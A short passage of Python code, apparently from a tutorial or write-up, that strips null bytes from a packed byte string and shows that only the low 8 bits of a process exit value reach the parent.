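survives = packed.replace(b"\x00", b"")  # what is left after bash drops the nulls
print(survives)

def reported_status(value):
    """Only the low 8 bits of exit()'s argument reach the parent process."""
    return value & 0xFF

# Whatever the upper bytes hold, a low byte of 0xff yields status 255.
print(reported_status(0xFF), reported_status(0x4141FF))
```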